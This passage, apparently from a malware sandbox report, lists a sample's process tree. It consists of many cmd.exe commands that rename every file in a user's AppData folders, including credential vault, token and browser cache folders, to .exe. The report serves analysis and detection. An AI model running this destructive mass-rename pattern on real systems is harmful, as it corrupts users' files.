        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mn\*.*" "*.exe"
        6⤵
        
        PID:3076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mr\*.*" "*.exe"
        6⤵
        
        PID:3124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ms\*.*" "*.exe"
        6⤵
        
        PID:1124
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mt-MT\*.*" "*.exe"
        6⤵
        
        PID:2792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nb-NO\*.*" "*.exe"
        6⤵
        
        PID:1980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ne-NP\*.*" "*.exe"
        6⤵
        
        PID:4828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\*.*" "*.exe"
        6⤵
        
        PID:660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\*.*" "*.exe"
        6⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nso-ZA\*.*" "*.exe"
        6⤵
        
        PID:1956
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\*.*" "*.exe"
        6⤵
        
        PID:4776
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa\*.*" "*.exe"
        6⤵
        
        PID:1468
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pa-Arab-PK\*.*" "*.exe"
        6⤵
        
        PID:1072
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\*.*" "*.exe"
        6⤵
        
        PID:3096
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\platforms\*.*" "*.exe"
        6⤵
        
        PID:2804
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\prs-AF\*.*" "*.exe"
        6⤵
        
        PID:456
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-BR\*.*" "*.exe"
        6⤵
        
        PID:416
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pt-PT\*.*" "*.exe"
        6⤵
        
        PID:2288
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\*.*" "*.exe"
        6⤵
        
        PID:740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quz-PE\*.*" "*.exe"
        6⤵
        
        PID:2624
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\*.*" "*.exe"
        6⤵
        
        PID:4660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ru\*.*" "*.exe"
        6⤵
        
        PID:4168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\rw\*.*" "*.exe"
        6⤵
        
        PID:3512
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sd-Arab-PK\*.*" "*.exe"
        6⤵
        
        PID:3452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\si-LK\*.*" "*.exe"
        6⤵
        
        PID:3472
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sk\*.*" "*.exe"
        6⤵
        
        PID:4792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sl\*.*" "*.exe"
        6⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\*.*" "*.exe"
        6⤵
        
        PID:1916
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-BA\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\*.*" "*.exe"
        6⤵
        
        PID:224
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\*.*" "*.exe"
        6⤵
        
        PID:4400
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\*.*" "*.exe"
        6⤵
        
        PID:2096
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1616
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\*.*" "*.exe"
        6⤵
        
        PID:236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\*.*" "*.exe"
        6⤵
        
        PID:1784
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\*.*" "*.exe"
        6⤵
        
        PID:1772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\*.*" "*.exe"
        6⤵
        
        PID:3764
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\*.*" "*.exe"
        6⤵
        
        PID:3292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\*.*" "*.exe"
        6⤵
        
        PID:4976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\*.*" "*.exe"
        6⤵
        
        PID:2792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\*.*" "*.exe"
        6⤵
        
        PID:3236
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\*.*" "*.exe"
        6⤵
        
        PID:1452
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\*.*" "*.exe"
        6⤵
        
        PID:2364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\*.*" "*.exe"
        6⤵
        
        PID:5112
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\*.*" "*.exe"
        6⤵
        
        PID:3336
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\*.*" "*.exe"
        6⤵
        
        PID:2956
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\*.*" "*.exe"
        6⤵
        
        PID:1076
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1580
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\*.*" "*.exe"
        6⤵
        
        PID:3220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\*.*" "*.exe"
        6⤵
        
        PID:1080
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\*.*" "*.exe"
        6⤵
        
        PID:1428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\*.*" "*.exe"
        6⤵
        
        PID:656
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\*.*" "*.exe"
        6⤵
        
        PID:2168
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\*.*" "*.exe"
        6⤵
        
        PID:4912
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\*.*" "*.exe"
        6⤵
        
        PID:3556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\*.*" "*.exe"
        6⤵
        
        PID:4720
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\*.*" "*.exe"
        6⤵
        
        PID:680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\*.*" "*.exe"
        6⤵
        
        PID:1576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\*.*" "*.exe"
        6⤵
        
        PID:908
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\*.*" "*.exe"
        6⤵
        
        PID:4152
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\*.*" "*.exe"
        6⤵
        
        PID:2740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\*.*" "*.exe"
        6⤵
        
        PID:2288
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\*.*" "*.exe"
        6⤵
        
        PID:1648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\*.*" "*.exe"
        6⤵
        
        PID:3680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\*.*" "*.exe"
        6⤵
        
        PID:2896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\*.*" "*.exe"
        6⤵
        
        PID:3124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\*.*" "*.exe"
        6⤵
        
        PID:4464
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\*.*" "*.exe"
        6⤵
        
        PID:3888
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\*.*" "*.exe"
        6⤵
        
        PID:572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\*.*" "*.exe"
        6⤵
        
        PID:3268
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\*.*" "*.exe"
        6⤵
        
        PID:4180
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\*.*" "*.exe"
        6⤵
        
        PID:3356
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\*.*" "*.exe"
        6⤵
        
        PID:2960
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\*.*" "*.exe"
        6⤵
        
        PID:1872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\*.*" "*.exe"
        6⤵
        
        PID:3676
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\*.*" "*.exe"
        6⤵
        
        PID:1488
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\*.*" "*.exe"
        6⤵
        
        PID:4788
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\*.*" "*.exe"
        6⤵
        
        PID:564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\*.*" "*.exe"
        6⤵
        
        PID:2884
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\*.*" "*.exe"
        6⤵
        
        PID:3160
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\logs\*.*" "*.exe"
        6⤵
        
        PID:1648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\*.*" "*.exe"
        6⤵
        
        PID:4584
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\Backup\*.*" "*.exe"
        6⤵
        
        PID:2124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\*.*" "*.exe"
        6⤵
        
        PID:1992
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\*.*" "*.exe"
        6⤵
        
        PID:4740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\*.*" "*.exe"
        6⤵
        
        PID:4860
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\Desktop\*.*" "*.exe"
        6⤵
        
        PID:4648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\*.*" "*.exe"
        6⤵
        
        PID:4956
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\Desktop\*.*" "*.exe"
        6⤵
        
        PID:3548
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\*.*" "*.exe"
        6⤵
        
        PID:3064
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\*.*" "*.exe"
        6⤵
        
        PID:3128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\0\*.*" "*.exe"
        6⤵
        
        PID:2308
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\*.*" "*.exe"
        6⤵
        
        PID:1384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\*.*" "*.exe"
        6⤵
        
        PID:2568
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\*.*" "*.exe"
        6⤵
        
        PID:2712
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"
        6⤵
        
        PID:2496
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"
        6⤵
        
        PID:3588
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\CloudStore\*.*" "*.exe"
        6⤵
        
        PID:1172
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"
        6⤵
        
        PID:4776
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"
        6⤵
        
        PID:1564
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2312
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"
        6⤵
        
        PID:2292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\*.*" "*.exe"
        6⤵
        
        PID:4152
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\*.*" "*.exe"
        6⤵
        
        PID:2196
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\*.*" "*.exe"
        6⤵
        
        PID:976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:3220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\*.*" "*.exe"
        6⤵
        
        PID:412
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\*.*" "*.exe"
        6⤵
        
        PID:2904
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"
        6⤵
        
        PID:3124
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\RoamingTiles\*.*" "*.exe"
        6⤵
        
        PID:2332
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\*.*" "*.exe"
        6⤵
        
        PID:2972
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"
        6⤵
        
        PID:1428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"
        6⤵
        
        PID:2836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\*.*" "*.exe"
        6⤵
        
        PID:4976
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\D4RAED6Y\*.*" "*.exe"
        6⤵
        
        PID:3556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"
        6⤵
        
        PID:1080
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\*.*" "*.exe"
        6⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\*.*" "*.exe"
        6⤵
        
        PID:1476
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\*.*" "*.exe"
        6⤵
        
        PID:3040
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"
        6⤵
        
        PID:1252
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"
        6⤵
        
        PID:3444
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012024100720241008\*.*" "*.exe"
        6⤵
        
        PID:2960
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"
        6⤵
        
        PID:4700
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\Low\*.*" "*.exe"
        6⤵
        
        PID:3708
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\*.*" "*.exe"
        6⤵
        
        PID:2084
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\*.*" "*.exe"
        6⤵
        
        PID:4316
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\*.*" "*.exe"
        6⤵
        
        PID:4228
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\*.*" "*.exe"
        6⤵
        
        PID:2180
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Low\*.*" "*.exe"
        6⤵
        
        PID:3396
      - C:\Windows\System32\cmd.exe
        
